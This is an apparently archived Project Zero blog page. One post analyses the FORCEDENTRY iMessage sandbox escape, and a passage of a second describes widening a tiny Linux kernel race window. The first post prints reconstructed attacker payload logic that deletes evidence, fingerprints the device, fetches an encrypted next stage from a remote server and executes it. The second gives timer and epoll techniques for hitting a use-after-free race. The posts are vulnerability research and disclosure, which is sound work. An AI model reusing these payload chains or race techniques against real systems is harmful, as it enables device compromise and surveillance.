Thursday, March 31, 2022

FORCEDENTRY: Sandbox Escape

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. Any editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Late last year we published a writeup of the initial remote code execution stage of FORCEDENTRY, the zero-click iMessage exploit attributed by Citizen Lab to NSO. By sending a .gif iMessage attachment (which was really a PDF) NSO were able to remotely trigger a heap buffer overflow in the ImageIO JBIG2 decoder. They used that vulnerability to bootstrap a powerful weird machine capable of loading the next stage in the infection process: the sandbox escape.

In this post we'll take a look at that sandbox escape. It's notable for using only logic bugs. In fact it's unclear where the features that it uses end and the vulnerabilities which it abuses begin. Both current and upcoming state-of-the-art mitigations such as Pointer Authentication and Memory Tagging have no impact at all on this sandbox escape.

An observation

During our initial analysis of the .gif file Samuel noticed that rendering the image appeared to leak memory. Running the heap tool after releasing all the associated resources gave the following output:

$ heap $pid


All zones: 4631 nodes (826336 bytes)        


   COUNT    BYTES     AVG   CLASS_NAME   TYPE   BINARY          

   =====    =====     ===   ==========   ====   ======        

    1969   469120   238.3   non-object

     825    26400    32.0   JBIG2Bitmap  C++   CoreGraphics

heap was able to determine that the leaked memory contained JBIG2Bitmap objects.

Using the -address option we could find all the individual leaked bitmap objects:

$ heap -address JBIG2Bitmap $pid

and dump them out to files. One of those objects was quite unlike the others:

$ hexdump -C dumpXX.bin | head

00000000  62 70 6c 69 73 74 30 30  |bplist00|


00000018        24 76 65 72 73 69  |  $versi|

00000020  6f 6e 59 24 61 72 63 68  |onY$arch|

00000028  69 76 65 72 58 24 6f 62  |iverX$ob|

00000030  6a 65 63 74 73 54 24 74  |jectsT$t|

00000038  6f 70                    |op      |

00000040        4e 53 4b 65 79 65  |  NSKeye|

00000048  64 41 72 63 68 69 76 65  |dArchive|

It's clearly a serialized NSKeyedArchiver. Definitely not what you'd expect to see in a JBIG2Bitmap object. Running strings we see plenty of interesting things (noting that the URL below is redacted):

Objective-C class and selector names:










The name of the file which delivered the exploit:


Filesystems paths:



a URL:

Using plutil we can convert the bplist00 binary format to XML. Performing some post-processing and cleanup we can see that the top-level object in the NSKeyedArchiver is a serialized NSFunctionExpression object.

NSExpression NSPredicate NSExpression

If you've ever used Core Data or tried to filter a Objective-C collection you might have come across NSPredicates. According to Apple's public documentation they are used "to define logical conditions for constraining a search for a fetch or for in-memory filtering".

For example, in Objective-C you could filter an NSArray object like this:

  NSArray* names = @[@"one", @"two", @"three"];

  NSPredicate* pred;

  pred = [NSPredicate predicateWithFormat:

            @"SELF beginswith[c] 't'"];

  NSLog(@"%@", [names filteredArrayUsingPredicate:pred]);

The predicate is "SELF beginswith[c] 't'". This prints an NSArray containing only "two" and "three".

[NSPredicate predicateWithFormat] builds a predicate object by parsing a small query language, a little like an SQL query.

NSPredicates can be built up from NSExpressions, connected by NSComparisonPredicates (like less-than, greater-than and so on.)

NSExpressions themselves can be fairly complex, containing aggregate expressions (like "IN" and "CONTAINS"), subqueries, set expressions, and, most interestingly, function expressions.

Prior to 2007 (in OS X 10.4 and below) function expressions were limited to just the following five extra built-in methods: sum, count, min, max, and average.

But starting in OS X 10.5 (which would also be around the launch of iOS in 2007) NSFunctionExpressions were extended to allow arbitrary method invocations with the FUNCTION keyword:

  "FUNCTION('abc', 'stringByAppendingString', 'def')" => @"abcdef"

FUNCTION takes a target object, a selector and an optional list of arguments then invokes the selector on the object, passing the arguments. In this case it will allocate an NSString object @"abc" then invoke the stringByAppendingString: selector passing the NSString @"def", which will evaluate to the NSString @"abcdef".

In addition to the FUNCTION keyword there's CAST which allows full reflection-based access to all Objective-C types (as opposed to just being able to invoke selectors on literal strings and integers):

  "FUNCTION(CAST('NSFileManager', 'Class'), 'defaultManager')"

Here we can get access to the NSFileManager class and call the defaultManager selector to get a reference to a process's shared file manager instance.

These keywords exist in the string representation of NSPredicates and NSExpressions. Parsing those strings involves creating a graph of NSExpression objects, NSPredicate objects and their subclasses like NSFunctionExpression. It's a serialized version of such a graph which is present in the JBIG2 bitmap.

NSPredicates using the FUNCTION keyword are effectively Objective-C scripts. With some tricks it's possible to build nested function calls which can do almost anything you could do in procedural Objective-C. Figuring out some of those tricks was the key to the 2019 Real World CTF DezhouInstrumenz challenge, which would evaluate an attacker supplied NSExpression format string. The writeup by the challenge author is a great introduction to these ideas and I'd strongly recommend reading that now if you haven't. The rest of this post builds on the tricks described in that post.

A tale of two parts

The only job of the JBIG2 logic gate machine described in the previous blog post is to cause the deserialization and evaluation of an embedded NSFunctionExpression. No attempt is made to get native code execution, ROP, JOP or any similar technique.

Prior to iOS 14.5 the isa field of an Objective-C object was not protected by Pointer Authentication Codes (PAC), so the JBIG2 machine builds a fake Objective-C object with a fake isa such that the invocation of the dealloc selector causes the deserialization and evaluation of the NSFunctionExpression. This is very similar to the technique used by Samuel in the 2020 SLOP post.

This NSFunctionExpression has two purposes:

Firstly, it allocates and leaks an ASMKeepAlive object then tries to cover its tracks by finding and deleting the .gif file which delivered the exploit.

Secondly, it builds a payload NSPredicate object then triggers a logic bug to get that NSPredicate object evaluated in the CommCenter process, reachable from the IMTranscoderAgent sandbox via the NSXPC service.

Let's look at those two parts separately:

Covering tracks

The outer level NSFunctionExpression calls performSelectorOnMainThread:withObject:waitUntilDone which in turn calls makeObjectsPerformSelector:@"expressionValueWithObject:context:" on an NSArray of four NSFunctionExpressions. This allows the four independent NSFunctionExpressions to be evaluated sequentially.

With some manual cleanup we can recover pseudo-Objective-C versions of the serialized NSFunctionExpressions.

The first one does this:

[[AMSKeepAlive alloc] initWithName:"KA"]

This allocates and then leaks an AppleMediaServices KeepAlive object. The exact purpose of this is unclear.

The second entry does this:

[[NSFileManager defaultManager] _web_removeFileOnlyAtPath:

  [@"/tmp/" stringByAppendingPathComponent:

    [ [ [ [

            [NSFileManager defaultManager]

            enumeratorAtPath: @"/tmp/"






            [NSPredicate predicateWithFormat:


                [@"SELF ENDSWITH '"

                  stringByAppendingString: "XXX.gif"]

                stringByAppendingString: "'"

      ]   ] ] ]





Reading these single expression NSFunctionExpressions is a little tricky; breaking that down into a more procedural form it's equivalent to this:

NSFileManager* fm = [NSFileManager defaultManager];

NSDirectoryEnumerator* dir_enum;

dir_enum = [fm enumeratorAtPath: @"/tmp/"]

NSArray* allTmpFiles = [dir_enum allObjects];

NSString* filter;

filter = ["@"SELF ENDSWITH '" stringByAppendingString: "XXX.gif"];

filter = [filter stringByAppendingString: "'"];

NSPredicate* pred;

pred = [NSPredicate predicateWithFormat: filter]

NSArray* matches;

matches = [allTmpFiles filteredArrayUsingPredicate: pred];

NSString* gif_subpath = [matches firstObject];

NSString* root = @"/tmp/";

NSString* full_path;

full_path = [root stringByAppendingPathComponent: gifSubpath];

[fm _web_removeFileOnlyAtPath: full_path];

This finds the XXX.gif file used to deliver the exploit which iMessage has stored somewhere under the /tmp/ folder and deletes it.

The other two NSFunctionExpressions build a payload and then trigger its evaluation in CommCenter. For that we need to look at NSXPC.


NSXPC is a semi-transparent remote-procedure-call mechanism for Objective-C. It allows the instantiation of proxy objects in one process which transparently forward method calls to the "real" object in another process:

I say NSXPC is only semi-transparent because it does enforce some restrictions on what objects are allowed to traverse process boundaries. Any object "exported" via NSXPC must also define a protocol which designates which methods can be invoked and the allowable types for each argument. The NSXPC programming guide further explains the extra handling required for methods which require collections and other edge cases.

The low-level serialization used by NSXPC is the same explored by Natalie Silvanovich in her 2019 blog post looking at the fully-remote attack surface of the iPhone. An important observation in that post was that subclasses of classes with any level of inheritance are also allowed, as is always the case with NSKeyedUnarchiver deserialization.

This means that any protocol object which declares a particular type for a field will also, by design, accept any subclass of that type.

The logical extreme of this would be that a protocol which declared an argument type of NSObject would allow any subclass, which is the vast majority of all Objective-C classes.

Grep to the rescue

This is fairly easy to analyze automatically. Protocols are defined statically so we can just find them and check each one. Tools like RuntimeBrowser and classdump can parse the static protocol definitions and output human-readable source code. Grepping the output of RuntimeBrowser like this is sufficient to find dozens of cases of NSObject pointers in Objective-C protocols:

  $ egrep -Rn "\(NSObject \*\)arg" *

Not all the results are necessarily exposed via NSXPC, but some clearly are, including the following two matches in CoreTelephony.framework:




        (CTXPCServiceSubscriptionContext *)arg1

       identity:(NSObject *)arg2

       completion:(void (^)(NSError *))arg3;




         (CTXPCServiceSubscriptionContext *)arg1

       key:(NSString *)arg2

       value:(NSObject *)arg3

       completion:(void (^)(NSError *))arg4;

evaluateMobileSubscriberIdentity string appears in the list of selector-like strings we first saw when running strings on the bplist00. Indeed, looking at the parsed and beautified NSFunctionExpression we see it doing this:

[ [ [CoreTelephonyClient alloc] init]



This is a wrapper around the lower-level NSXPC code and the argument passed as Y above to the CoreTelephonyClient method corresponds to the identity:(NSObject *)arg2 argument passed via NSXPC to CommCenter (which is the process that hosts, the NSXPC service underlying the CoreTelephonyClient). Since the parameter is explicitly named as NSObject* we can in fact pass any subclass of NSObject*, including an NSPredicate! Game over?

Parsing vs Evaluation

It's not quite that easy. The DezhouInstrumentz writeup discusses this attack surface and notes that there's an extra, specific mitigation. When an NSPredicate is deserialized by its initWithCoder: implementation it sets a flag which disables evaluation of the predicate until the allowEvaluation method is called.

So whilst you certainly can pass an NSPredicate* as the identity argument across NSXPC and get it deserialized in CommCenter, the implementation of evaluateMobileSubscriberIdentity: in CommCenter is definitely not going to call allowEvaluation:  to make the predicate safe for evaluation then evaluateWithObject: and then evaluate it.

Old techniques, new tricks

From the exploit we can see that they in fact pass an NSArray with two elements:

[0] = AVSpeechSynthesisVoice

[1] = PTSection {rows = NSArray { [0] = PTRow() }

The first element is an AVSpeechSynthesisVoice object and the second is a PTSection containing a single PTRow. Why?

PTSection and PTRow are both defined in the PrototypeTools private framework. PrototypeTools isn't loaded in the CommCenter target process. Let's look at what happens when an AVSpeechSynthesisVoice is deserialized:

Finding a voice

AVSpeechSynthesisVoice is implemented in AVFAudio.framework, which is loaded in CommCenter:

$ sudo vmmap `pgrep CommCenter` | grep AVFAudio

__TEXT  7ffa22c4c000-7ffa22d44000 r-x/r-x SM=COW \


Assuming that this was the first time that an AVSpeechSynthesisVoice object was created inside CommCenter (which is quite likely) the Objective-C runtime will call the initialize method on the AVSpeechSynthesisVoice class before instantiating the first instance.

[AVSpeechSynthesisVoice initialize] has a dispatch_once block with the following code:

NSBundle* bundle;

bundle = [NSBundle bundleWithPath:



if (![bundle isLoaded]) {

    NSError err;

    [bundle loadAndReturnError:&err]


So sending a serialized AVSpeechSynthesisVoice object will cause CommCenter to load the /System/Library/AccessibilityBundles/AXSpeechImplementation.bundle library. With some scripting using otool -L to list dependencies we can  find the following dependency chain from AXSpeechImplementation.bundle to PrototypeTools.framework:












This explains how the deserialization of a PTSection will succeed. But what's so special about PTSections and PTRows?

Predicated Sections

[PTRow initwithcoder:] contains the following snippet:

  self->condition = [coder decodeObjectOfClass:NSPredicate


  [self->condition allowEvaluation]

This will deserialize an NSPredicate object, assign it to the PTRow member variable condition and call allowEvaluation. This is meant to indicate that the deserializing code considers this predicate safe, but there's no attempt to perform any validation on the predicate contents here. They then need one more trick to find a path to which will additionally evaluate the PTRow's condition predicate.

Here's a snippet from [PTSection initWithCoder:]:

NSSet* allowed = [NSSet setWithObjects: @[PTRow]]

id* rows = [coder decodeObjectOfClasses:allowed forKey:@"rows"]

[self initWithRows:rows]

This deserializes an array of PTRows and passes them to [PTSection initWithRows] which assigns a copy of the array of PTRows to PTSection->rows then calls [self _reloadEnabledRows] which in turn passes each row to [self _shouldEnableRow:]

_shouldEnableRow:row {

  if (row->condition) {

    return [row->condition evaluateWithObject: self->settings]



And thus, by sending a PTSection containing a single PTRow with an attached condition NSPredicate they can cause the evaluation of an arbitrary NSPredicate, effectively equivalent to arbitrary code execution in the context of CommCenter.

Payload 2

The NSPredicate attached to the PTRow uses a similar trick to the first payload to cause the evaluation of six independent NSFunctionExpressions, but this time in the context of the CommCenter process. They're presented here in pseudo Objective-C:

Expression 1

[  [CaliCalendarAnonymizer sharedAnonymizedStrings]




         @""], '0']

   forKey: @"0"


The use of [CaliCalendarAnonymizer sharedAnonymizedStrings] is a trick to enable the array of independent NSFunctionExpressions to have "local variables". In this first case they create an NSURLComponents object which is used to build parameterised URLs. This URL builder is then stored in the global dictionary returned by [CaliCalendarAnonymizer sharedAnonymizedStrings] under the key "0".

Expression 2




 ] load]

This causes the OpusFoundation library to be loaded. The exact reason for this is unclear, though the dependency graph of OpusFoundation does include AuthKit which is used by the next NSFunctionExpression. It's possible that this payload is generic and might also be expected to work when evaluated in processes where AuthKit isn't loaded.

Expression 3

[ [ [CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"0" ]


    [ [ [NSArray arrayWithObject:


                    queryItemWithName: @"m"

                    value:[AKDevice _hardwareModel] ]

                                 ] arrayByAddingObject:


                    queryItemWithName: @"v"

                    value:[AKDevice _buildNumber] ]

                                 ] arrayByAddingObject:


                    queryItemWithName: @"u"

                    value:[NSString randomString]]


This grabs a reference to the NSURLComponents object stored under the "0" key in the global sharedAnonymizedStrings dictionary then parameterizes the HTTP query string with three values:

  [AKDevice _hardwareModel] returns a string like "iPhone12,3" which determines the exact device model.

  [AKDevice _buildNumber] returns a string like "18A8395" which in combination with the device model allows determining the exact firmware image running on the device.

  [NSString randomString] returns a decimal string representation of a 32-bit random integer like "394681493".

Expression 4

[ [CaliCalendarAnonymizer sharedAnonymizedString]






               [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

                 objectForKey:@"0"] URL]

          ] AES128DecryptWithPassword:NSData(XXXX)

         ]  decompressedDataUsingAlgorithm:3 error:]

       options: Class(NSConstantValueExpression)

      format: Class(NSConstantValueExpression)





The innermost reference to sharedAnonymizedStrings here grabs the NSURLComponents object and builds the full url from the query string parameters set last earlier. That url is passed to [NSData dataWithContentsOfURL:] to fetch a data blob from a remote server.

That data blob is decrypted with a hardcoded AES128 key, decompressed using zlib then parsed as a plist. That parsed plist is stored in the sharedAnonymizedStrings dictionary under the key "1".

Expression 5

[ [[NSThread mainThread] threadDictionary]


    [[CaliCalendarAnonymizer sharedAnonymizedStrings]



This copies all the keys and values from the "next-stage" plist into the main thread's theadDictionary.

Expression 6

[ [NSExpression expressionWithFormat:

    [[[CaliCalendarAnonymizer sharedAnonymizedStrings]


    objectForKey: @"a"]


  expressionValueWithObject:nil context:nil


Finally, this fetches the value of the "a" key from the next-stage plist, parses it as an NSExpression string and evaluates it.

End of the line

At this point we lose the ability to follow the exploit. The attackers have escaped the IMTranscoderAgent sandbox, requested a next-stage from the command and control server and executed it, all without any memory corruption or dependencies on particular versions of the operating system.

In response to this exploit iOS 15.1 significantly reduced the computational power available to NSExpressions:

NSExpression immediately forbids certain operations that have significant side effects, like creating and destroying objects. Additionally, casting string class names into Class objects with NSConstantValueExpression is deprecated.

In addition the PTSection and PTRow objects have been hardened with the following check added around the parsing of serialized NSPredicates:

if (os_variant_allows_internal_security_policies(

      "") {

  [coder decodeObjectOfClass:NSPredicate forKey:@"condition]


Object deserialization across trust boundaries still presents an enormous attack surface however.


Perhaps the most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox. With just two tricks (NSObject pointers in protocols and library loading gadgets) it's likely possible to attack almost every initWithCoder implementation in the dyld_shared_cache. There are presumably many other classes in addition to NSPredicate and NSExpression which provide the building blocks for logic-style exploits.

The expressive power of NSXPC just seems fundamentally ill-suited for use across sandbox boundaries, even though it was designed with exactly that in mind. The attack surface reachable from inside a sandbox should be minimal, enumerable and reviewable. Ideally only code which is required for correct functionality should be reachable; it should be possible to determine exactly what that exposed code is and the amount of exposed code should be small enough that manually reviewing it is tractable.

NSXPC requiring developers to explicitly add remotely-exposed methods to interface protocols is a great example of how to make the attack surface enumerable - you can at least find all the entry points fairly easily. However the support for inheritance means that the attack surface exposed there likely isn't reviewable; it's simply too large for anything beyond a basic example.

Refactoring these critical IPC boundaries to be more prescriptive - only allowing a much narrower set of objects in this case - would be a good step towards making the attack surface reviewable. This would probably require fairly significant refactoring for NSXPC; it's built around natively supporting the Objective-C inheritance model and is used very broadly. But without such changes the exposed attack surface is just too large to audit effectively.

The advent of Memory Tagging Extensions (MTE), likely shipping in multiple consumer devices across the ARM ecosystem this year, is a big step in the defense against memory corruption exploitation. But attackers innovate too, and are likely already two steps ahead with a renewed focus on logic bugs. This sandbox escape exploit is likely a sign of the shift we can expect to see over the next few years if the promises of MTE can be delivered. And this exploit was far more extensible, reliable and generic than almost any memory corruption exploit could ever hope to be.

Thursday, March 24, 2022

Racing against the clock -- hitting a tiny kernel race window


How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:

  • use a cache miss to widen the race window a little bit
  • make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
  • make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll

Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.


I recently discovered a race condition ( in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT, which would make it possible to preempt a thread with another thread, as I described at LSSEU2019.

This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.

This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.

The UAF reproducer is in our bugtracker.

The bug

In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.

When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)

One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:

All relevant states are RCU-accessible. An RCU-accessible object can have either a zero refcount or a positive refcount. Objects with a positive refcount can be either live or owned by the garbage collector. When the GC attempts to grab a file, it transitions from the state "live" to the state "owned by GC" by getting exclusive ownership of all references to the file.

While __fget_files() is making an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:

__fget_files() first uses get_file_rcu() to conditionally narrow the state of a file from "any RCU-accessible state" to "any refcounted state". Then it has to narrow the state from "any refcounted state" to "live", but instead it just assumes that they are equivalent.

And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:

The fix is to properly narrow the state from "any refcounted state" to "live" by checking whether the file is still referenced by a file descriptor table entry.

The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.

[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]

My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed:

[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]

The race

There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:

static struct file *__fget_files(struct files_struct *files, unsigned int fd,

                                 fmode_t mask, unsigned int refs)


        struct file *file;



        file = files_lookup_fd_rcu(files, fd); // race window start

        if (file) {

                /* File object ref couldn't be taken.

                 * dup2() atomicity guarantee is the reason

                 * we loop to catch the new file (or NULL pointer)


                if (file->f_mode & mask)

                        file = NULL;

                else if (!get_file_rcu_many(file, refs)) // race window end

                        goto loop;



        return file;


In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").

In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:

<__fget_files+0x1e> cmp    r10,rax

<__fget_files+0x21> sbb    rax,rax

<__fget_files+0x24> mov    rdx,QWORD PTR [r11+0x8]

<__fget_files+0x28> and    eax,r8d

<__fget_files+0x2b> lea    rax,[rdx+rax*8]

<__fget_files+0x2f> mov    r12,QWORD PTR [rax] ; RACE WINDOW START

; r12 now contains file*

<__fget_files+0x32> test   r12,r12

<__fget_files+0x35> je     ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x37> mov    eax,r9d

<__fget_files+0x3a> and    eax,DWORD PTR [r12+0x44] ; LOAD (for ->f_mode)

<__fget_files+0x3f> jne    ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x41> mov    rax,QWORD PTR [r12+0x38] ; LOAD (for ->f_count)

<__fget_files+0x46> lea    rdx,[r12+0x38]

<__fget_files+0x4b> test   rax,rax

<__fget_files+0x4e> je     ffffffff812e3def <__fget_files+0x6f>

<__fget_files+0x50> lea    rcx,[rsi+rax*1]

<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)

As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.

Missing some cache

Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)

For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).

However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.

An interruption

Okay, a cache miss might be something like a few dozen or maybe hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?

On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.

One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.

(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)

Setting an alarm

A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).

High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.

The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...

[Sidenote] Absolute timers: Not quite absolute

So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter(TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).

However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.

Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)

A really big list of things to do

Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?

Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.

Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.

When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.

And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.

Measuring race outcomes

A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused:

  • If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
  • If dup() returns a file descriptor:
  • If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
  • If it returns the old victim FD number:
  • If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
  • If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.

Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.

Results: Debian kernel, on Tiger Lake

I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.

This graph shows histograms of race attempt outcomes (too early, success, or too late), with the timing offset at which the outcome occurred on the X axis. The graph shows that depending on the timing offset, up to around 1/3 of race attempts succeeded.

Results: Other kernel, on Skylake

This graph shows similar histograms for a Skylake processor. The exact distribution is different, but again, depending on the timing offset, around 1/3 of race attempts succeeded.

These measurements are from an older laptop with a Skylake CPU, running a different kernel. Here "0" on the X axis is offset -1 us relative to the timer. (These timings are from a system that's running a different kernel from the one shown above, but I don't think that makes a difference.)

The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!

How important is the cache miss?

